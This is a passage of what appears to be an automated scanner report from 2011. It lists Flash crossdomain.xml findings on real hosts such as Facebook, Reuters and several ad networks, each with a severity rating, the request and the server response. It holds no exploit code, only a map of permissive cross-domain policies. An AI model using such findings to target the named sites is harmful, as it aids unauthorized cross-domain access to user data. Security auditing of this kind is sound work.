<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

6.41. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:13:13 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 29 Jun 2011 21:44:06 GMT
ETag: "1d83ce-ca-4a6e0af03f580"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

6.42. http://tcr.tynt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Sun, 04 Sep 2011 01:04:39 GMT
ETag: "251523935"
Expires: Sun, 04 Sep 2011 01:34:39 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54F8)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.43. http://trc.taboolasyndication.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 01:01:04 GMT
Content-Type: text/xml
Content-Length: 409
Last-Modified: Sun, 10 Jul 2011 17:16:59 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
<allow-access-from domain="*" secure="false"/>
<allow-access-from domain="*" to-ports="80,443"/>
...[SNIP]...

6.44. http://turn.nexac.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://turn.nexac.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: turn.nexac.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 04 Sep 2011 00:57:26 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sun, 04 Sep 2011 00:57:25 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

6.45. http://usatoday1.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:37 GMT
Server: Omniture DC/2.0.0
xserver: www166
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://wa.proflowers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.proflowers.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:07:03 GMT
Server: Omniture DC/2.0.0
xserver: www625
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.47. http://www.wunderground.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wunderground.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.wunderground.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:55 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
Last-Modified: Thu, 26 May 2011 00:03:43 GMT
Accept-Ranges: bytes
Content-Length: 201
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.48. http://adadvisor.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adadvisor.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adadvisor.net

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:49:48 GMT
Connection: close
Server: AAWebServer
P3P: policyref="http://www.adadvisor.net/w3c/p3p.xml",CP="NOI NID"
Content-Length: 478
Content-Type: Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="
...[SNIP]...
<allow-access-from domain="*.tubemogul.com" />
...[SNIP]...
<allow-access-from domain="*.adap.tv" />
...[SNIP]...
<allow-access-from domain="*.videoegg.com" />
...[SNIP]...
<allow-access-from domain="*.tidaltv.com" />
...[SNIP]...

6.49. http://ads.adbrite.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: none
Content-Type: text/x-cross-domain-policy
Date: Sun, 04 Sep 2011 00:57:22 GMT
Server: XPEHb/1.0
Content-Length: 398
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!-- AdBrite crossdomain.xml for BritePic and BriteFlic -->
<cross-domain-policy>
<allow-access-from domain="*.adbrite.com" secure="true" />
<allow-access-from domain="www.adbrite.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.britepic.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.britepic.com" secure="true" />
...[SNIP]...

6.50. http://cim.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cim.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cim.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:08:38 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.51. http://cm.npc-mcclatchy.overture.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.npc-mcclatchy.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.npc-mcclatchy.overture.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:14 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.52. http://content.usatoday.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.usatoday.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 16 Mar 2011 20:16:44 GMT
Accept-Ranges: bytes
ETag: "c3bb41117e4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:48:05 GMT
Connection: close
Content-Length: 1558

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.usatoday.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.usatoday.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="projects.usatoday.com"/>
   <allow-access-from domain="*.gannettonline.com"/>
   <allow-access-from domain="www.smashingideas.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="beta.tagware.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="nmp.newsgator.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.maventechnologies.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.mavenapps.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="hostlogic.ca" secure="true"/>
...[SNIP]...
<allow-access-from domain="pages.samsung.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
   <allow-access-from domain="*.facebook.com" />
   <allow-access-from domain="demo.pointroll.net" />
   <allow-access-from domain="*.brightcove.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.metagrapher.com" />
...[SNIP]...

6.53. http://grfx.cstv.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://grfx.cstv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: grfx.cstv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1717425046"
Last-Modified: Tue, 30 Aug 2011 23:41:52 GMT
Content-Length: 909
Server: lighttpd/1.4.19
Date: Sun, 04 Sep 2011 00:45:18 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.fansonly.com" />
<allow-access-from domain="*.initinteractive.com" />
<allow-access-from domain="174.132.109.106" />
<allow-access-from domain="*.cstv.com" />
<allow-access-from domain="*.ocsn.com" />
<allow-access-from domain="*.collegesports.com" />
<allow-access-from domain="livestats.*.fansonly.com" />
<allow-access-from domain="livestats.*.cstv.com" />
<allow-access-from domain="livestats.*.collegesports.com" />
<allow-access-from domain="*.rolltide.com" />
<allow-access-from domain="*.ucirvinesports.com" />
<allow-access-from domain="*.doubleclick.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="flv.sales.cbs.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mediapm.edgesuite.net" secure="false" />
...[SNIP]...

6.54. http://mi.adinterax.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mi.adinterax.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=7776000
Date: Sun, 04 Sep 2011 00:59:10 GMT
Content-Length: 708
Content-Type: application/xml
Expires: Tue, 08 Nov 2011 10:18:21 GMT
Last-Modified: Thu, 02 Sep 2010 20:10:03 GMT
Accept-Ranges: bytes
Server: Footprint Distributor V4.6
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.adinterax.com" />
<allow-access-from domain="adinterax.cnet.com.edgesuite.net" />
<allow-access-from domain="adinterax.myspace.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

6.55. http://optimized-by.rubiconproject.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: optimized-by.rubiconproject.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Last-Modified: Fri, 17 Sep 2010 22:21:19 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Accept-Ranges: bytes
Content-Length: 223
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.rubiconproject.com" />

...[SNIP]...

6.56. http://rd.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://rd.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: rd.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:35 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 91
Last-Modified: Wed, 26 Jan 2011 19:56:05 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
   <allow-access-from domain="*.meebo.com"/>
</cross-domain-policy>

6.57. http://snas.nbcuni.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: snas.nbcuni.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:26 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
Last-Modified: Fri, 17 Dec 2010 18:25:22 GMT
ETag: "2c9cd-58b-4979f4b136880"
Accept-Ranges: bytes
Content-Length: 1419
Cache-Control: max-age=10
Expires: Sun, 04 Sep 2011 00:53:36 GMT
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><allow-access-from domain="*.ivillage.com" /><allow-access-from domain="*.nbbcdev.com" /><allow-access-from domain="*.bravotv.com" /><allow-access-from domain="*.console.net" /><allow-access-from domain="*.digphilly.com"/><allow-access-from domain="*.nbc10rss.com"/><allow-access-from domain="*.nbc10.com"/><allow-access-from domain="*.scifi.com"/><allow-access-from domain="*.weatherplus.com" /><allow-access-from domain="*.nbcuxd.com" /><allow-access-from domain="vplayer-preview-dev.nbcuni.ge.com" /><allow-access-from domain="*.industrynext.com"/><allow-access-from domain="*.nbcuni.com"/><allow-access-from domain="widgets.nbcuni.com"/><allow-access-from domain="*.nbc.com"/><allow-access-from domain="*.thetonightshowwithconan.com"/><allow-access-from domain="*.tonightshowwithconanobrien.com"/><allow-access-from domain="*.thetonightshowwithconanobrien.com"/><allow-access-from domain="*.tonightshow.com" /><allow-access-from domain="*.tonightshowwithconan.com" /><allow-access-from domain="*.latenightwithjimmyfallon.com" /><allow-access-from domain="*.ingaylewetrust.com" /><allow-access-from domain="*.thejaylenoshow.com" /><allow-access-from domain="127.0.0.1"/><allow-access-from domain="localhost"/><allow-access-from domain="*.sudjam.com"/>
...[SNIP]...

6.58. http://syndication.mmismm.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: syndication.mmismm.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:34 GMT
Server: Apache
Last-Modified: Mon, 25 Jul 2011 02:20:52 GMT
ETag: "10e-4a8db76d7c900"
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

6.59. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.62.155.33
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

6.60. http://www.meebo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 04 Sep 2011 01:10:22 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 303
Last-Modified: Tue, 09 Aug 2011 21:34:10 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.meebo.com"/>
<allow-access-from domain="*.meebo.com"/>
<allow-access-from domain="meebo.com"/>
<allow-access-from domain="*.meebome.com"/>
<allow-access-from domain="www.meebome.com"/>
<allow-access-from domain="meebome.com"/>
...[SNIP]...

6.61. http://www.reuters.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.reuters.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.reuters.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:47:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 04 Sep 2011 00:52:47 GMT
browser-expires: Sun, 4 Sep 2011 00:47:47 GMT
Content-Type: text/xml;charset=UTF-8
Content-Length: 857
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.reuters.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.reutersmedia.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="ad.uk.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="feedroom.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="creatives.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.oho.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.metacarta.com" secure="false"/>
...[SNIP]...

6.62. http://www.sacbee.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sacbee.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sacbee.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 15 Aug 2011 23:32:59 GMT
ETag: "a12c7f-175-4e49acab"
Server: Apache/1.3.41
Content-Type: application/xml
Cache-Control: max-age=154
Date: Sun, 04 Sep 2011 00:58:05 GMT
Content-Length: 373
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
   "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.sacbee.com"/>
   <allow-access-from domain="*.mcclatchyinteractive.com"/>
   <allow-access-from domain="*.vmixcore.com"/>
...[SNIP]...

6.63. http://www.youtube.com/crossdomain.xml  previous  next

Summary

